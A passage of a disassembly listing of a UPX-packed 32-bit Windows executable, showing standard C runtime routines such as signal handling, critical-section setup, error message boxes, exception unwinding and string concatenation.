sub_40960B endp
; =============== S U B R O U T I N E =======================================
sub_409624 proc near ; CODE XREF: sub_409665+5A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, ds:dword_40F33C
push esi
loc_40962F: ; CODE XREF: sub_409624+1E�j
cmp [eax+4], edx
jz short loc_409644
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_40962F
loc_409644: ; CODE XREF: sub_409624+E�j
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_409655
cmp [eax+4], edx
jz short locret_409657
loc_409655: ; CODE XREF: sub_409624+2A�j
xor eax, eax
locret_409657: ; CODE XREF: sub_409624+2F�j
retn
sub_409624 endp
; =============== S U B R O U T I N E =======================================
sub_409658 proc near ; CODE XREF: UPX0:loc_409D6D�p
push ds:dword_410780
call sub_40470B
pop ecx
retn
sub_409658 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409665 proc near ; CODE XREF: UPX0:00409D78�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040980F SIZE 00000006 BYTES
push 20h
push offset dword_40E228
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_4096CD
jz short loc_409698
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_4096AE
sub eax, ecx
jz short loc_409698
sub eax, ecx
jz short loc_4096F8
sub eax, ecx
jnz short loc_4096DC
loc_409698: ; CODE XREF: sub_409665+1C�j
; sub_409665+29�j
call sub_4048B0
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_4096BA
loc_4096A6: ; CODE XREF: sub_409665+91�j
or eax, 0FFFFFFFFh
jmp loc_40980F
; ---------------------------------------------------------------------------
loc_4096AE: ; CODE XREF: sub_409665+25�j
mov esi, offset dword_410778
mov eax, ds:dword_410778
jmp short loc_40971A
; ---------------------------------------------------------------------------
loc_4096BA: ; CODE XREF: sub_409665+3F�j
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_409624
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_409727
; ---------------------------------------------------------------------------
loc_4096CD: ; CODE XREF: sub_409665+1A�j
mov eax, ebx
sub eax, 0Fh
jz short loc_409710
sub eax, 6
jz short loc_409704
dec eax
jz short loc_4096F8
loc_4096DC: ; CODE XREF: sub_409665+31�j
call sub_4053C0
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402191
add esp, 14h
jmp short loc_4096A6
; ---------------------------------------------------------------------------
loc_4096F8: ; CODE XREF: sub_409665+2D�j
; sub_409665+75�j
mov esi, offset dword_410780
mov eax, ds:dword_410780
jmp short loc_40971A
; ---------------------------------------------------------------------------
loc_409704: ; CODE XREF: sub_409665+72�j
mov esi, offset dword_41077C
mov eax, ds:dword_41077C
jmp short loc_40971A
; ---------------------------------------------------------------------------
loc_409710: ; CODE XREF: sub_409665+6D�j
mov esi, offset dword_410784
mov eax, ds:dword_410784
loc_40971A: ; CODE XREF: sub_409665+53�j
; sub_409665+9D�j ...
mov [ebp+var_1C], 1
push eax
call sub_40470B
loc_409727: ; CODE XREF: sub_409665+66�j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_40980F
cmp [ebp+var_20], eax
jnz short loc_409743
push 3
call sub_4057EA
loc_409743: ; CODE XREF: sub_409665+D5�j
cmp [ebp+var_1C], eax
jz short loc_40974F
push eax
call sub_4079D2
pop ecx
loc_40974F: ; CODE XREF: sub_409665+E1�j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_409763
cmp ebx, 0Bh
jz short loc_409763
cmp ebx, 4
jnz short loc_40977E
loc_409763: ; CODE XREF: sub_409665+F2�j
; sub_409665+F7�j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_4097B1
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_40977E: ; CODE XREF: sub_409665+FC�j
cmp ebx, 8
jnz short loc_4097B1
mov ecx, ds:dword_40F330
mov [ebp+var_24], ecx
loc_40978C: ; CODE XREF: sub_409665+14A�j
mov ecx, ds:dword_40F334
mov edx, ds:dword_40F330
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_4097B8
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_40978C
; ---------------------------------------------------------------------------
loc_4097B1: ; CODE XREF: sub_409665+10A�j
; sub_409665+11C�j
call sub_404702
mov [esi], eax
loc_4097B8: ; CODE XREF: sub_409665+138�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4097D9
cmp ebx, 8
jnz short sub_4097E8
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_4097EC
sub_409665 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4097D3 proc near ; DATA XREF: UPX1:0040E240�o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_4097D3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4097D9 proc near ; CODE XREF: sub_409665+15A�p
cmp dword ptr [ebp-1Ch], 0
jz short locret_4097E7
push 0
call sub_4078FA
pop ecx
locret_4097E7: ; CODE XREF: sub_4097D9+4�j
retn
sub_4097D9 endp
; =============== S U B R O U T I N E =======================================
sub_4097E8 proc near ; CODE XREF: sub_409665+162�j
push ebx
call dword ptr [ebp-20h]
loc_4097EC: ; CODE XREF: sub_409665+16C�j
pop ecx
cmp ebx, 8
jz short loc_4097FC
cmp ebx, 0Bh
jz short loc_4097FC
cmp ebx, 4
jnz short loc_40980D
loc_4097FC: ; CODE XREF: sub_4097E8+8�j
; sub_4097E8+D�j
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40980D
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_40980D: ; CODE XREF: sub_4097E8+12�j
; sub_4097E8+1D�j
xor eax, eax
sub_4097E8 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_409665
loc_40980F: ; CODE XREF: sub_409665+44�j
; sub_409665+CC�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_409665
; =============== S U B R O U T I N E =======================================
sub_409815 proc near ; CODE XREF: sub_405819+21�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_41078C, eax
retn
sub_409815 endp
; =============== S U B R O U T I N E =======================================
sub_40981F proc near ; CODE XREF: sub_405819+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_410798, eax
retn
sub_40981F endp
; =============== S U B R O U T I N E =======================================
sub_409829 proc near ; CODE XREF: sub_405819+F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_41079C, eax
retn
sub_409829 endp
; =============== S U B R O U T I N E =======================================
sub_409833 proc near ; DATA XREF: sub_409843:loc_4098A8�o
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_40C100 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
sub_409833 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409843 proc near ; CODE XREF: sub_406718+15F�p
; sub_406718+1F5�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 14h
push offset dword_40E248
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
push ds:dword_41079C
call sub_40470B
pop ecx
mov esi, eax
cmp esi, edi
jnz short loc_4098B9
lea eax, [ebp+var_1C]
push eax
call sub_4055F2
pop ecx
cmp eax, edi
jz short loc_409881
push edi
push edi
push edi
push edi
push edi
call sub_402095
add esp, 14h
loc_409881: ; CODE XREF: sub_409843+2F�j
cmp [ebp+var_1C], 1
jz short loc_4098A8
push offset aKernel32_dll_0 ; "kernel32.dll"
call dword_40C064 ; GetModuleHandleA
cmp eax, edi
jz short loc_4098A8
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call dword_40C068 ; GetProcAddress
mov esi, eax
cmp esi, edi
jnz short loc_4098AD
loc_4098A8: ; CODE XREF: sub_409843+42�j
; sub_409843+51�j
mov esi, offset sub_409833
loc_4098AD: ; CODE XREF: sub_409843+63�j
push esi
call sub_404694
pop ecx
mov ds:dword_41079C, eax
loc_4098B9: ; CODE XREF: sub_409843+21�j
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_4]
push [ebp+arg_0]
call esi
mov [ebp+var_20], eax
jmp short loc_4098F8
; ---------------------------------------------------------------------------
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor ecx, ecx
cmp eax, 0C0000017h
setz cl
mov eax, ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_24], 0C0000017h
jnz short loc_4098F4
push 8
call dword_40C080 ; RtlSetLastWin32Error
loc_4098F4: ; CODE XREF: sub_409843+A7�j
and [ebp+var_20], 0
loc_4098F8: ; CODE XREF: sub_409843+84�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_409843 endp
; =============== S U B R O U T I N E =======================================
sub_409908 proc near ; CODE XREF: sub_409908+BD�p
; UPX0:004099EE�p ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_409998
push large dword ptr fs:0
mov eax, ds:dword_40F060
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_40993A: ; CODE XREF: sub_409908+64�j
; sub_409908+80�j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_40998A
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_40995C
cmp esi, edx
jbe short loc_40998A
loc_40995C: ; CODE XREF: sub_409908+4E�j
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_40993A
push 101h
mov eax, [ebx+8]
call sub_409F49
mov ecx, 1
mov eax, [ebx+8]
call sub_409F68
jmp short loc_40993A
; ---------------------------------------------------------------------------
loc_40998A: ; CODE XREF: sub_409908+45�j
; sub_409908+52�j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_409998: ; DATA XREF: sub_409908+14�o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4099DD
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_40224A
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_409908
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4099DD: ; CODE XREF: sub_409908+A0�j
retn
sub_409908 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_409908
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_4099FA proc near ; CODE XREF: sub_4058D0+89�p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_4099FA endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4058D0
loc_409A11: ; CODE XREF: sub_4058D0+170�j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_409F49
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_4058D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A2A proc near ; CODE XREF: sub_4058D0+11F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_409A3F
push ecx
call sub_40B00E ; RtlUnwind
loc_409A3F: ; DATA XREF: sub_409A2A+A�o
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409A2A endp
; =============== S U B R O U T I N E =======================================
sub_409A44 proc near ; CODE XREF: sub_4058D0+137�p
; sub_4058D0+18C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_409908
add esp, 0Ch
pop ebp
retn 8
sub_409A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409A5B proc near ; CODE XREF: sub_405F23+15D�p
var_30 = dword ptr -30h
var_20 = byte ptr -20h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
call sub_404702
xor ebx, ebx
cmp ds:dword_4107DC, ebx
mov [ebp+var_8], eax
mov [ebp+var_4], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz loc_409B31
push offset aUser32_dll ; "USER32.DLL"
call dword_40C0FC ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_409C11
mov esi, dword_40C068
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; dword_40C068
cmp eax, ebx
jz loc_409C11
push eax
call sub_404694
mov [esp+30h+var_30], offset aGetactivewindo ; "GetActiveWindow"
push edi
mov ds:dword_4107DC, eax
call esi ; dword_40C068
push eax
call sub_404694
mov [esp+30h+var_30], offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4107E0, eax
call esi ; dword_40C068
push eax
call sub_404694
mov ds:dword_4107E4, eax
lea eax, [ebp+var_C]
push eax
call sub_4055F2
test eax, eax
pop ecx
pop ecx
jz short loc_409AFF
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402095
add esp, 14h
loc_409AFF: ; CODE XREF: sub_409A5B+95�j
cmp [ebp+var_C], 2
jnz short loc_409B31
push offset aGetuserobjecti ; "GetUserObjectInformationA"
push edi
call esi ; dword_40C068
push eax
call sub_404694
cmp eax, ebx
pop ecx
mov ds:dword_4107EC, eax
jz short loc_409B31
push offset aGetprocesswind ; "GetProcessWindowStation"
push edi
call esi ; dword_40C068
push eax
call sub_404694
pop ecx
mov ds:dword_4107E8, eax
loc_409B31: ; CODE XREF: sub_409A5B+22�j
; sub_409A5B+A8�j ...
mov eax, ds:dword_4107E8
mov ecx, [ebp+var_8]
cmp eax, ecx
jz short loc_409BB6
cmp ds:dword_4107EC, ecx
jz short loc_409BB6
push eax
call sub_40470B
push ds:dword_4107EC
mov esi, eax
call sub_40470B
cmp esi, ebx
pop ecx
pop ecx
mov edi, eax
jz short loc_409BB6
cmp edi, ebx
jz short loc_409BB6
call esi ; GetProcAddress
cmp eax, ebx
jz short loc_409B83
lea ecx, [ebp+var_14]
push ecx
push 0Ch
lea ecx, [ebp+var_20]
push ecx
push 1
push eax
call edi ; InterlockedIncrement
test eax, eax
jz short loc_409B83
test [ebp+var_18], 1
jnz short loc_409BB6
loc_409B83: ; CODE XREF: sub_409A5B+10D�j
; sub_409A5B+120�j
lea eax, [ebp+var_10]
push eax
call sub_405629
test eax, eax
pop ecx
jz short loc_409B9E
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402095
add esp, 14h
loc_409B9E: ; CODE XREF: sub_409A5B+134�j
cmp [ebp+var_10], 4
jb short loc_409BAD
or [ebp+arg_8], 200000h
jmp short loc_409BF1
; ---------------------------------------------------------------------------
loc_409BAD: ; CODE XREF: sub_409A5B+147�j
or [ebp+arg_8], 40000h
jmp short loc_409BF1
; ---------------------------------------------------------------------------
loc_409BB6: ; CODE XREF: sub_409A5B+E0�j
; sub_409A5B+E8�j ...
mov eax, ds:dword_4107E0
cmp eax, [ebp+var_8]
jz short loc_409BF1
push eax
call sub_40470B
cmp eax, ebx
pop ecx
jz short loc_409BF1
call eax ; dword_4107E0
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_409BF1
mov eax, ds:dword_4107E4
cmp eax, [ebp+var_8]
jz short loc_409BF1
push eax
call sub_40470B
cmp eax, ebx
pop ecx
jz short loc_409BF1
push [ebp+var_4]
call eax ; dword_4107E4
mov [ebp+var_4], eax
loc_409BF1: ; CODE XREF: sub_409A5B+150�j
; sub_409A5B+159�j ...
push ds:dword_4107DC
call sub_40470B
cmp eax, ebx
pop ecx
jz short loc_409C11
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+var_4]
call eax
jmp short loc_409C13
; ---------------------------------------------------------------------------
loc_409C11: ; CODE XREF: sub_409A5B+37�j
; sub_409A5B+4D�j ...
xor eax, eax
loc_409C13: ; CODE XREF: sub_409A5B+1B4�j
pop edi
pop esi
pop ebx
leave
retn
sub_409A5B endp
; =============== S U B R O U T I N E =======================================
sub_409C18 proc near ; CODE XREF: sub_405F23+117�p
; sub_405F23+139�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_409C2D
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_409C48
loc_409C2D: ; CODE XREF: sub_409C18+B�j
; sub_409C18+3A�j
call sub_4053C0
push 16h
pop esi
mov [eax], esi
loc_409C37: ; CODE XREF: sub_409C18+69�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402191
add esp, 14h
mov eax, esi
jmp short loc_409C85
; ---------------------------------------------------------------------------
loc_409C48: ; CODE XREF: sub_409C18+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_409C54
loc_409C50: ; CODE XREF: sub_409C18+48�j
mov [eax], bl
jmp short loc_409C2D
; ---------------------------------------------------------------------------
loc_409C54: ; CODE XREF: sub_409C18+36�j
mov edx, eax
loc_409C56: ; CODE XREF: sub_409C18+44�j
cmp [edx], bl
jz short loc_409C5E
inc edx
dec edi
jnz short loc_409C56
loc_409C5E: ; CODE XREF: sub_409C18+40�j
cmp edi, ebx
jz short loc_409C50
loc_409C62: ; CODE XREF: sub_409C18+55�j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_409C6F
dec edi
jnz short loc_409C62
loc_409C6F: ; CODE XREF: sub_409C18+52�j
cmp edi, ebx
jnz short loc_409C83
mov [eax], bl
call sub_4053C0
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_409C37
; ---------------------------------------------------------------------------
loc_409C83: ; CODE XREF: sub_409C18+59�j
xor eax, eax
loc_409C85: ; CODE XREF: sub_409C18+2E�j
pop edi
pop esi
pop ebx
retn
sub_409C18 endp
; =============== S U B R O U T I N E =======================================
sub_409C89 proc near ; CODE XREF: sub_405F23+27�p
; sub_405F23+38�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jl short loc_409CB2
cmp ecx, 2
jle short loc_409CA5
cmp ecx, 3
jnz short loc_409CB2
mov eax, ds:dword_40FE1C
pop esi
retn
; ---------------------------------------------------------------------------
loc_409CA5: ; CODE XREF: sub_409C89+E�j
mov eax, ds:dword_40FE1C
mov ds:dword_40FE1C, ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_409CB2: ; CODE XREF: sub_409C89+9�j
; sub_409C89+13�j
call sub_4053C0
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402191
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
sub_409C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CCF proc near ; CODE XREF: sub_409D20+A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_407FBB
movzx eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov dl, [ebp+arg_C]
test [ecx+eax+1Dh], dl
jnz short loc_409D0E
cmp [ebp+arg_8], 0
jz short loc_409D08
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, [ebp+arg_8]
jmp short loc_409D0A
; ---------------------------------------------------------------------------
loc_409D08: ; CODE XREF: sub_409CCF+25�j
xor eax, eax
loc_409D0A: ; CODE XREF: sub_409CCF+37�j
test eax, eax
jz short loc_409D11
loc_409D0E: ; CODE XREF: sub_409CCF+1F�j
xor eax, eax
inc eax
loc_409D11: ; CODE XREF: sub_409CCF+3D�j
cmp [ebp+var_4], 0
jz short locret_409D1E
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_409D1E: ; CODE XREF: sub_409CCF+46�j
leave
retn
sub_409CCF endp
; =============== S U B R O U T I N E =======================================
sub_409D20 proc near ; CODE XREF: sub_40625A+3F�p
; sub_406392+53�p ...
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
push 0
call sub_409CCF
add esp, 10h
retn
sub_409D20 endp
; =============== S U B R O U T I N E =======================================
sub_409D33 proc near ; CODE XREF: sub_406FB3+59�p
; sub_406FB3+6A�p ...
arg_0 = dword ptr 4
xor eax, eax
inc eax
cmp [esp+arg_0], 0
jnz short locret_409D3F
xor eax, eax
locret_409D3F: ; CODE XREF: sub_409D33+8�j
retn
sub_409D33 endp
; ---------------------------------------------------------------------------
loc_409D40: ; CODE XREF: sub_407773:loc_4077A1�p
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_40F060
xor eax, ebp
mov [ebp+2A4h], eax
test ds:byte_40FB00, 1
push esi
jz short loc_409D6D
push 0Ah
call sub_405F23
pop ecx
loc_409D6D: ; CODE XREF: UPX0:00409D63�j
call sub_409658
test eax, eax
jz short loc_409D7E
push 16h
call sub_409665
pop ecx
loc_409D7E: ; CODE XREF: UPX0:00409D74�j
test ds:byte_40FB00, 2
jz loc_409E2B
mov [ebp+88h], eax
mov [ebp+84h], ecx
mov [ebp+80h], edx
mov [ebp+7Ch], ebx
mov [ebp+78h], esi
mov [ebp+74h], edi
mov word ptr [ebp+0A0h], ss
mov word ptr [ebp+94h], cs
mov word ptr [ebp+70h], ds
mov word ptr [ebp+6Ch], es
mov word ptr [ebp+68h], fs
mov [ebp+64h], gs
pushf
pop dword ptr [ebp+98h]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+9Ch], eax
mov dword ptr [ebp-28h], 10001h
mov [ebp+90h], esi
mov eax, [eax-4]
push 50h
mov [ebp+8Ch], eax
lea eax, [ebp-80h]
push 0
push eax
call sub_4021D0
lea eax, [ebp-80h]
add esp, 0Ch
mov [ebp-30h], eax
lea eax, [ebp-28h]
push 0
mov dword ptr [ebp-80h], 40000015h
mov [ebp-74h], esi
mov [ebp-2Ch], eax
call dword_40C03C ; SetUnhandledExceptionFilter
lea eax, [ebp-30h]
push eax
call dword_40C038 ; UnhandledExceptionFilter
loc_409E2B: ; CODE XREF: UPX0:00409D85�j
push 3
call sub_4057EA
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_409E4C
push dword ptr [ebp+8]
call sub_40B00E ; RtlUnwind
loc_409E4C: ; DATA XREF: UPX0:00409E3F�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_409E54: ; DATA XREF: sub_409E99+B�o
; UPX0:00409F26�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_409E98
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_40224A
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_409E99
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_409E98: ; CODE XREF: UPX0:00409E64�j
retn
; =============== S U B R O U T I N E =======================================
sub_409E99 proc near ; CODE XREF: UPX0:00409E80�p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_409E54
push large dword ptr fs:0
mov eax, ds:dword_40F060
xor eax, esp
push eax
lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_409EC2: ; CODE XREF: sub_409E99:loc_409F09�j
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_409F0B
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_409EDE
cmp esi, [esp+24h+arg_4]
jbe short loc_409F0B
loc_409EDE: ; CODE XREF: sub_409E99+3D�j
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_409F09
push 101h
mov eax, [ebx+esi*4+8]
call sub_409F49
mov eax, [ebx+esi*4+8]
call sub_409F68
loc_409F09: ; CODE XREF: sub_409E99+57�j
jmp short loc_409EC2
; ---------------------------------------------------------------------------
loc_409F0B: ; CODE XREF: sub_409E99+36�j
; sub_409E99+43�j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_409E99 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_409E54
jnz short locret_409F3F
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_409F3F
mov eax, 1
locret_409F3F: ; CODE XREF: UPX0:00409F2D�j
; UPX0:00409F38�j
retn
; =============== S U B R O U T I N E =======================================
sub_409F40 proc near ; CODE XREF: sub_407810+1E�p
; sub_407810+40�p
push ebx
push ecx
mov ebx, offset dword_40FB04
jmp short loc_409F54
sub_409F40 endp
; =============== S U B R O U T I N E =======================================
sub_409F49 proc near ; CODE XREF: sub_409908+6E�p
; sub_4058D0+4149�p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_40FB04
mov ecx, [esp+8+arg_0]
loc_409F54: ; CODE XREF: sub_409F40+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_409F49 endp
; =============== S U B R O U T I N E =======================================
sub_409F68 proc near ; CODE XREF: sub_409908+7B�p
; sub_409E99+6B�p
call eax
retn
sub_409F68 endp
; =============== S U B R O U T I N E =======================================
sub_409F6B proc near ; CODE XREF: sub_407A03+E9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40A0F9
push dword ptr [esi+4]
call sub_404F20
push dword ptr [esi+8]
call sub_404F20
push dword ptr [esi+0Ch]
call sub_404F20
push dword ptr [esi+10h]
call sub_404F20
push dword ptr [esi+14h]
call sub_404F20
push dword ptr [esi+18h]
call sub_404F20
push dword ptr [esi]
call sub_404F20
push dword ptr [esi+20h]
call sub_404F20
push dword ptr [esi+24h]
call sub_404F20
push dword ptr [esi+28h]
call sub_404F20
push dword ptr [esi+2Ch]
call sub_404F20
push dword ptr [esi+30h]
call sub_404F20
push dword ptr [esi+34h]
call sub_404F20
push dword ptr [esi+1Ch]
call sub_404F20
push dword ptr [esi+38h]
call sub_404F20
push dword ptr [esi+3Ch]
call sub_404F20
add esp, 40h
push dword ptr [esi+40h]
call sub_404F20
push dword ptr [esi+44h]
call sub_404F20
push dword ptr [esi+48h]
call sub_404F20
push dword ptr [esi+4Ch]
call sub_404F20
push dword ptr [esi+50h]
call sub_404F20
push dword ptr [esi+54h]
call sub_404F20
push dword ptr [esi+58h]
call sub_404F20
push dword ptr [esi+5Ch]
call sub_404F20
push dword ptr [esi+60h]
call sub_404F20
push dword ptr [esi+64h]
call sub_404F20
push dword ptr [esi+68h]
